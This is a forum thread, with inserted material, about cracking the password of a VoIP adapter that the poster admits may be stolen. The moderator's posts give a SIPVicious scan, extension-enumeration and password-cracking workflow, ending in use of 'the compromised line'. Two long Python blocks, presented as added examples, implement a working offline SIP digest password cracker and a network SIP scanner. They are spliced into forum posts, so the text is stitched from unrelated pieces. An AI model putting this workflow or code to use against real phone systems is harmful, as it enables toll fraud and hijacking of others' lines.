
Thread: No documentation on SIPCRACK or am I using it wrongly?

  1. #1
    Just burned his ISO
    Join Date
    Jun 2008
    Posts
    8

    Default No documentation on SIPCRACK or am I using it wrongly?

    Sorry to be such a newbie, but I am really uncomfortable with command lines in Linux: I have only used one successfully before, on ONE occasion, when I once successfully ran ndiswrapper.

    Some bum sold me a SIP locked to his VoIP provider, or stolen from them; I can't figure out which, and the manufacturer won't help me (nor would PayPal, who seemingly couldn't care less about users conning people or users selling stolen items using PayPal).

    So I am stuck with this locked SIP and saw the reference to SIPCRACK. I assume this is what the application is for?

    I have connected up a fresh computer with some old hard drives in it and booted off the CD to a desktop, with the SIP connected to the (only) MoBo LAN socket. I haven't bothered connecting up the telephone to the SIP yet, nor managed to get a WiFi connection with my MA111, which the CD doesn't seem to recognise; but it seems to me that I don't need to have an internet connection to use SIPCRACK?

    With only one 'ethernet' connection, I assume SIPCRACK needs to look at eth0? If it isn't, I can't quite figure out how to establish where it is, to put the location into the command line. I tried opening a KDE Konsole, but it just gives lists of potential ethernet connections without telling me which one the SIP is at or how to identify it.

    I am not sure what SIPDUMP is, but surely if I can run SIPCRACK with the correct command line, it should put a million passwords a second through the SIP until it finds the password and then write it to (the hard drive?) as the dumped file?

    So I took the plunge and typed in sipdump -i eth0 logins.dump (which didn't SEEM TO like eth0) and then sipcrack -w mywordlist.txt logins.dump, which it also didn't seem to like. Presumably because the SIPDUMP command didn't execute properly.

    Can anyone advise how to identify the SIP, or what it was that I did wrong, of all the myriad things I probably did do wrongly, please?

    Or is SIPCRACK only for identifying the password on a working SIP, such as one installed by Vonage, so that you can unlock the RTP300 by knowing the password and then use the second line for another VoIP operator?

  2. #2
    Super Moderator Archangel-Amael's Avatar
    Join Date
    Jan 2010
    Location
    Somewhere
    Posts
    8,012

    Default

    With your freakin' small-arse font size I couldn't read your post very well. But by the title it seems you are looking for documentation.

    Google's first hit gives us the home of sipcrack right over at remote exploit
    http://www.remote-exploit.org/codes_sipcrack.html

    If you need more help hit me back and please use a normal font and I will try and help you.
    To be successful here you should read all of the following.
    ForumRules
    ForumFAQ
    If you are new to Back|Track
    Back|Track Wiki
    Failure to do so will probably get your threads deleted or worse.

  3. #3
    Just burned his ISO
    Join Date
    Jun 2008
    Posts
    8

    Default No, I wasn't asking for documentation

    Quote Originally Posted by archangel.amael View Post
    With your freakin' small-arse font size I couldn't read your post very well. But by the title it seems you are looking for documentation.

    Google's first hit gives us the home of sipcrack right over at remote exploit remote-exploit.org/codes_sipcrack.htm

    If you need more help hit me back and please use a normal font and I will try and help you.
    Yes, that was where I got the commands I entered. What I was trying to figure out was what I was doing wrong. Sorry for the font size, which I thought was normal; let me make the type size larger.

    MOD EDIT: JUST USE THE DEFAULT FONT AND NOBODY WILL HAVE A PROBLEM.
    USING THE HUGE FONT YOU HAD BEFORE THE EDIT JUST MAKES YOUR POST VERY BIG AND VERY LIKELY TO BE IGNORED.

  4. #4
    Super Moderator Archangel-Amael's Avatar
    Join Date
    Jan 2010
    Location
    Somewhere
    Posts
    8,012

    Default

    Quote Originally Posted by licensedtoquill View Post
    Yes, that was where I got the commands I entered: What I was trying to figure out was what I was doing wrong? Sorry for the font size which I thought was normal. let me put the type size larger
    Just use the default and it will be ok.

    I have connected up a fresh computer with some old hard drives in it and booted off the CD to a desktop with the SIP connected to the (only) MoBo LAN socket. I havent bothered connecting up the telephone to the SIP yet, nor managed to get a WiFi connection with my MA111 which the CD doesnt seem to recognise; but it seems to me that I dont need to have an internet connection to use SIPCRACK?
    You may not need an internet connection in order to test on a local network. However, if you could not ping some website, how do you know that you can even transmit or receive on the local network?

    With only one 'ethernet' connection, I assume SIPCRACK needs to look at eth0? If it isnt, I cant quite figure out how to establish where it is to put the location into the command line? I tried opening a KDE Console but it just gives lists of potential ethernet connections without telling me which one the SIP is at or how to identify it
    The app needs to know which NIC to use in order to transmit or receive information. Generally speaking, in Linux terms eth0 is the first connected or recognized Ethernet card. This can be changed; however, that is a different subject. What location are you looking to put in a command line? Again, generally the device that one wants to use goes toward the beginning of a command, but not always. As for KDE or Konsole, this has nothing to do with the tool, which is a command-line tool. So realistically one might not even need to have KDE installed.

    As for finding where a SIP is, that does not seem right either. SIP is a protocol and not something that you would normally see. SIP is a means to allow initiation, modification and termination of an interactive user session.
    So identifying it in Konsole is most likely not going to happen.



    I am not sure what SIPDUMP is but surely if I can run SIPCRACK with the correct command line, it should put a million passwords a second through the SIP until it finds the password and then write it to (the hard drive?) as the dumped file??
    If you do not know what the tool is or is used for, it might stand to reason to learn about it and what it can do before you do something that you don't want to (i.e. mess up a computer, get in trouble with your ISP or break the law). I am not saying not to use the tool, but you might want to read more about it and the protocols.


    So I took the plunge and typed in sipdump -i eth0 logins.dump (of which it didnt SEEM TO like eth0) and then sipcrack -w mywordlist.txt logins.dump which it also didnt seem to like. Presumably as the SIPDUMP command didnt execute properly
    How do you know it did not execute properly? Was there something that told you this? Are you sure that you have the right syntax and targets specified? More info is needed.
    Or is SIPCRACK only for identifying the password on a working SIP such as one installed by Vonage, - so that you can unlock the RTP300 by knowing the password and then use the second line for another VoIP operator
    As taken from the page referenced earlier,
    "SIPcrack is a SIP login sniffer/cracker that contains 2 programs: sipdump to capture the digest authentication

    If you would like, you can have a look at these two threads I have posted on using a newer tool that has more support. The first one is on using SIPVicious.
    The second one is on setting up a VMware image of a trixbox, which is a PBX that supports SIP and VoIP. This will give you the chance not only to learn about the tools, but also how they can be used against your networks.
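The quoted description of sipcrack ("sipdump to capture the digest authentication") is the whole point of the tool: a SIP phone does not send its password, it sends an MD5 Digest response (RFC 2617, carried in SIP per RFC 3261) computed from the password, the server's nonce and the request method/URI. Whoever captures that REGISTER can test candidate passwords offline. The following added example (not code from the thread, sipcrack or the Cisco firmware) does that in Python: it parses the Authorization header out of a REGISTER, recomputes the response for each wordlist entry, and stops on a match. The REGISTER it cracks is constructed by the `build_register` helper with a known password; the user, realm, nonce and addresses in it are made up, and the dump-file format of the real sipdump is not reproduced.

```python
import hashlib
import re

# SIP uses HTTP Digest authentication (RFC 2617, carried in SIP per RFC 3261).
# The server sends a nonce in a 401/407 challenge; the phone answers with an
# MD5 over (user, realm, password) and (method, uri).  Anyone who captures the
# answer can test candidate passwords offline, which is what sipcrack does.


def md5_hex(data: str) -> str:
    return hashlib.md5(data.encode("utf-8")).hexdigest()


def digest_response(username, realm, password, method, uri, nonce,
                    qop=None, nc=None, cnonce=None):
    """Compute the Digest 'response' value exactly as an RFC 2617 client does."""
    ha1 = md5_hex(f"{username}:{realm}:{password}")
    ha2 = md5_hex(f"{method}:{uri}")          # qop=auth-int would also hash the body
    if qop is None:                            # RFC 2069 style, common on old ATAs
        return md5_hex(f"{ha1}:{nonce}:{ha2}")
    return md5_hex(f"{ha1}:{nonce}:{nc}:{cnonce}:{qop}:{ha2}")


# name="quoted value"  or  name=bare-token
_PARAM_RE = re.compile(r'(\w+)=(?:"([^"]*)"|([^,\s]+))')


def parse_authorization(sip_message: str):
    """Extract the request method and Digest parameters from a SIP request, or None."""
    lines = sip_message.split("\r\n")
    method = lines[0].split(" ", 1)[0]
    for line in lines[1:]:
        name, _, value = line.partition(":")
        if name.strip().lower() not in ("authorization", "proxy-authorization"):
            continue
        value = value.strip()
        if not value.lower().startswith("digest "):
            continue
        params = {k: quoted or bare for k, quoted, bare in _PARAM_RE.findall(value[7:])}
        params["method"] = method
        return params
    return None


def crack_digest(auth: dict, wordlist):
    """Return the first candidate password that reproduces the captured response."""
    if auth.get("algorithm", "MD5").upper() != "MD5":
        raise ValueError(f"unsupported algorithm {auth['algorithm']}")
    target = auth["response"].lower()
    for candidate in wordlist:
        got = digest_response(auth["username"], auth["realm"], candidate,
                              auth["method"], auth["uri"], auth["nonce"],
                              auth.get("qop"), auth.get("nc"), auth.get("cnonce"))
        if got == target:
            return candidate
    return None


# --- constructed sample traffic (demo data, not real sipdump output) ----------
def build_register(password, qop=None):
    """Build the REGISTER a phone would send after a 401 challenge (made-up values)."""
    user, realm, uri = "2001", "voip.example.net", "sip:voip.example.net"
    nonce, nc, cnonce = "dcd98b7102dd2f0e8b11d0f600bfb0c093", "00000001", "0a4f113b"
    response = digest_response(user, realm, password, "REGISTER", uri, nonce, qop, nc, cnonce)
    auth = (f'Digest username="{user}", realm="{realm}", nonce="{nonce}", '
            f'uri="{uri}", response="{response}", algorithm=MD5')
    if qop:
        auth += f', qop={qop}, nc={nc}, cnonce="{cnonce}"'
    return ("REGISTER sip:voip.example.net SIP/2.0\r\n"
            "Via: SIP/2.0/UDP 192.168.1.50:5060;branch=z9hG4bK776asdhds\r\n"
            "From: <sip:2001@voip.example.net>;tag=1928301774\r\n"
            "To: <sip:2001@voip.example.net>\r\n"
            "Call-ID: a84b4c76e66710@192.168.1.50\r\n"
            "CSeq: 2 REGISTER\r\n"
            f"Authorization: {auth}\r\n"
            "Content-Length: 0\r\n\r\n")


if __name__ == "__main__":
    captured = build_register("sip1234")
    auth = parse_authorization(captured)
    print("captured digest for", auth["username"], "@", auth["realm"], "=", auth["response"])
    print("cracked:", crack_digest(auth, ["password", "1234", "admin", "sip1234"]))
```

Two things this makes concrete for the question in the thread: the capture has to happen on the interface the phone's REGISTER actually crosses (a sniffer on eth0 sees nothing if the adapter is plugged into a different port or into a switch that does not mirror traffic), and nothing is "put through" the device at all; the phone must register on its own while you listen, after which the cracking is purely offline.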

  5. #5
    Just burned his ISO
    Join Date
    Jun 2008
    Posts
    8

    Default Going around in circles on SIPCRACK?

    "What location are you looking to put in a command line?"

    The thing I call a SIP.

    "As for finding where a SIP is at that does not seem right either. SIP is a Protocol and not something that you would normally see. SIP is a means to allow initiation modification and termination of an interactive user session."

    I call the box which transmutes the Ethernet signal into a telephone one a SIP. If this is wrong, tell me what my Cisco box is and I will repost using your word.
    "So identifying it in Konsole is most likely not going to happen." So how DO I identify what the system sees what I call a SIP as, so that I can put it into the command line?


    "If you do not know what the tool is or is used for, it might stand to reason to learn about it and what it can do before you do something that you don't want to (i.e. mess up a computer, get in trouble with your ISP or break the law). I am not saying not to use the tool, but you might want to read more about it and the protocols."

    I agree this is a bit difficult where the person who wrote the software doesn't want to support it, and I say I have already read and acted on the explanation page he DOES let slip onto the internet.

    "How do you know it did not execute properly?" It told me that the 'thing' I was trying to crack was not at ETH0. "Was there something that told you this?" "Are you sure that you have the right syntax and targets specified? More info is needed."

    We are going around in circles. I posted precisely because something not only told me this, it also told me the part of the command line which was wrong: it was ETH0.

    If I can't use SIPCRACK, can I use SIPVicious to plug millions of passwords into the thing I call a SIP until it finds the password? (BTW, PLEASE don't use this opportunity to tell me again that this thing isn't called a SIP. I will use any word you like to identify this box.)


    I don't THINK I need to learn about setting up a VMware image of a trixbox or use a PBX that supports SIP and VoIP.

    I would like to learn about the tools, but only so far as to know how to crack a password on the electronic box I am trying to use to convert the Ethernet signal into an (RS232?) VoIP one, not how they can be used against networks.

  6. #6
    Just burned his ISO
    Join Date
    Jun 2008
    Posts
    8

    Default

    Oh, and one other thing: is there some command line I can use with SIPCRACK (or indeed SIPVicious) to get it to plug millions of passwords into my Cisco ATA 186 if I know the MAC address of the unit I am trying to crack?

  7. #7
    Super Moderator Archangel-Amael's Avatar
    Join Date
    Jan 2010
    Location
    Somewhere
    Posts
    8,012

    Default

    Check this out: you have a Cisco SIP box you want to crack the password of.
    Well, since you can't seem to get it with sipcrack, try this instead with SIPVicious.
    SIPVicious can identify SIP devices and PBX servers on default and non-default ports.
    Code:
    #./svmap 1.1.1.1/24
    This will scan a range of IPs, or you can modify it for your needs; see the man page or my tutorial video for more info.
    Next, the output will show you any and all SIP devices or PBX servers.
    If none are found and you know that they should exist, then A. the PBX is immune to your scans (doubtful, but it might be), or B. the syntax needs to be changed.
    You might need to use the -m flag. Most devices support the OPTIONS method, but some do not, so in that case you may need to use the REGISTER or INVITE methods. Do note that INVITE can cause a "ring" on the other end.
    Once you have mapped the PBX, you can move to svwar to find the extensions on the PBX; svwar is basically a war dialer for SIP lines.
    Again, see the man page for more info on usage flags.
    example would look like:
    Code:
    #./svwar 10.0.0.1
    Once you have mapped out the extensions from your PBX mapping, you can move on to cracking the passwords of the lines, using svcrack.

    Now you should have both the mapping and the extensions for the host or IP block or whatever. Now we can begin to crack the passwords for the users. This type of password cracking is like other types of cracking:
    it may take a long time and not be worthwhile.
    svcrack makes use of digest authentication. It can crack both registrars and proxy servers.
    So, for example usage:
    Code:
    #./svcrack.py 10.0.0.1 -u 192 -d dictionary.txt
    The -u flag is for the extension you mapped earlier with svwar.
    The -d flag, of course, is the dictionary;
    it can be named anything, and of course you can specify the location of the dictionary using stdin.
    The password, once cracked, will show in the terminal like so:
    Code:
    | Extension | Password |
    | 192       | passw0rd |
    you@sipphone sipvicious]$
    After you have cracked the password you can then move on to using the compromised line.

    As for not using the tutorials I have posted, that is your choice, but I will say this: finding and cracking PBXs is about as simple as cracking WEP in wireless. So if you take the time to have a look at it you may find the answers you are seeking.

    As for Cisco and Vonage, they are two different ways of doing business.
    They do not use the same protocols.
    Another hint on Vonage is that it maintains two IP addresses at all times for communications.

    Good luck, and if you get stuck on it post back and I will try to help you further along. But please take your time and do all of the reading that you can. I will only show you general usage and nothing specific to your case, because I am not going to post anything that may be considered illegal.

    EDIT: Also, in BT3 Final there are a boatload of SIP tools included, so it may pay to have a look at them as well.
    I plan on getting some tutorials up on their usage, time permitting.
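The first step above, svmap, is a SIP OPTIONS sweep: an OPTIONS request is answered by any compliant endpoint with a 200 OK whose User-Agent (or Server) and Allow headers say what the device is, and unlike INVITE it never rings a phone. The following added example (not SIPVicious code, and not from the thread) shows the exchange with both sides in Python: `build_options` writes the probe, `probe` sends it over UDP and parses whatever comes back, and `start_fake_device` stands in for the target on 127.0.0.1 so the block runs offline. The fake device, its "ExampleATA/1.0" User-Agent string and its Allow list are constructed for the demo; a real adapter would answer with its own values, or with nothing if it only listens for REGISTER.

```python
import random
import socket
import threading

# svmap's trick: send a SIP OPTIONS request (harmless: unlike INVITE it does
# not ring the phone) and read the User-Agent/Server header of whatever answers.


def build_options(target_host, target_port, local_host="127.0.0.1", local_port=5060):
    """Build a minimal RFC 3261 OPTIONS request aimed at target_host:target_port."""
    branch = "z9hG4bK%08x" % random.getrandbits(32)   # RFC 3261 magic cookie + random suffix
    return ("OPTIONS sip:%s:%d SIP/2.0\r\n" % (target_host, target_port) +
            "Via: SIP/2.0/UDP %s:%d;branch=%s;rport\r\n" % (local_host, local_port, branch) +
            "From: <sip:probe@%s>;tag=%08x\r\n" % (local_host, random.getrandbits(32)) +
            "To: <sip:probe@%s>\r\n" % target_host +
            "Call-ID: %016x@%s\r\n" % (random.getrandbits(64), local_host) +
            "CSeq: 1 OPTIONS\r\n"
            "Max-Forwards: 70\r\n"
            "Accept: application/sdp\r\n"
            "Content-Length: 0\r\n\r\n")


def parse_headers(text):
    """Split a SIP message into its first line and a lower-cased header dict."""
    head = text.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers.setdefault(name.strip().lower(), value.strip())
    return lines[0], headers


def parse_response(data: bytes):
    """Return {'status', 'user_agent', 'allow'} for a SIP response, None for junk."""
    status_line, headers = parse_headers(data.decode("utf-8", "replace"))
    parts = status_line.split(" ", 2)
    if len(parts) < 2 or parts[0] != "SIP/2.0" or not parts[1].isdigit():
        return None
    return {"status": int(parts[1]),
            "user_agent": headers.get("user-agent") or headers.get("server"),
            "allow": headers.get("allow")}


def probe(host, port, timeout=2.0):
    """Send one OPTIONS probe; return the parsed response, or None on silence."""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
        sock.settimeout(timeout)
        sock.sendto(build_options(host, port).encode(), (host, port))
        try:
            data, _ = sock.recvfrom(65535)
        except socket.timeout:
            return None
    return parse_response(data)


def start_fake_device(user_agent="ExampleATA/1.0 (constructed)"):
    """Stand-in for a SIP endpoint on loopback; answers one request, then exits."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    srv.bind(("127.0.0.1", 0))          # kernel picks a free port
    srv.settimeout(5.0)
    port = srv.getsockname()[1]

    def serve():
        try:
            data, peer = srv.recvfrom(65535)
            request_line, hdr = parse_headers(data.decode("utf-8", "replace"))
            if not request_line.startswith("OPTIONS "):
                srv.sendto(b"SIP/2.0 405 Method Not Allowed\r\nContent-Length: 0\r\n\r\n", peer)
                return
            # RFC 3261 8.2.6: a response copies Via, From, To, Call-ID and CSeq.
            reply = ("SIP/2.0 200 OK\r\n"
                     "Via: %s\r\nFrom: %s\r\nTo: %s;tag=%08x\r\nCall-ID: %s\r\nCSeq: %s\r\n"
                     % (hdr.get("via", ""), hdr.get("from", ""), hdr.get("to", ""),
                        random.getrandbits(32), hdr.get("call-id", ""), hdr.get("cseq", "")) +
                     "User-Agent: %s\r\n" % user_agent +
                     "Allow: INVITE, ACK, CANCEL, OPTIONS, BYE, REGISTER\r\n"
                     "Content-Length: 0\r\n\r\n")
            srv.sendto(reply.encode(), peer)
        except socket.timeout:
            pass
        finally:
            srv.close()

    threading.Thread(target=serve, daemon=True).start()
    return port


def fingerprint_loopback_demo():
    """Start the fake device, probe it, and return what a scanner would learn."""
    port = start_fake_device()
    return probe("127.0.0.1", port)


if __name__ == "__main__":
    print(fingerprint_loopback_demo())
```

Against a real network replace the loopback target with the adapter's address and loop over the range; a device that never answers OPTIONS is the case the post covers with the -m flag, and the same `parse_response` will read the 401 that comes back from a REGISTER probe, whose WWW-Authenticate realm and nonce are the inputs the digest cracking stage needs.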

  8. #8
    Senior Member Thorn's Avatar
    Join Date
    Jan 2010
    Location
    The Green Dome
    Posts
    1,509

    Default

    Quote Originally Posted by licensedtoquill View Post
    I call the box which transmutes the ethernet signal into a telephone one a SIP: If this is wrong, tell me what my Cisco box is and I will repost using your word.
    The Cisco ATA 186 is a handset-to-Ethernet adapter or converter that turns traditional telephone devices into VoIP devices. The protocols it supports are SIP (RFC 2543) and CCP.

    Quote Originally Posted by licensedtoquill View Post
    I would like to learn about the tools, but only so far as to know how to crack a password on my electronic box I am trying to use to convert the Ethernet signal into an (RS232?) VoIP one, not how they can be used against networks.
    I may be wrong about this since I've not used either tool, but I believe that SIPCRACK and SIPDUMP are for capturing and decoding the SIP packets on the network. From the sounds of the prior posts, it appears that you need to examine the configuration of the Cisco ATA 186 adapter.

    According to the data sheet, the Cisco ATA 186 adapter supports configuration via HTTP (in other words, it has a built-in web interface for configuring it). Have you attempted to gain access to that interface? If you have, and that is what is locked, then I suggest that you:

    a) Look for documentation on the Cisco ATA 186, as it may be locked with a default administrator account and password, and

    b) If the default account/passwords don't work, look at a brute force password tool such as Hydra or Medusa.

    EDIT:
    The web page on setting up the ATA 186 is on this page. That page also includes procedures for resetting the ATA 186 to the factory settings.
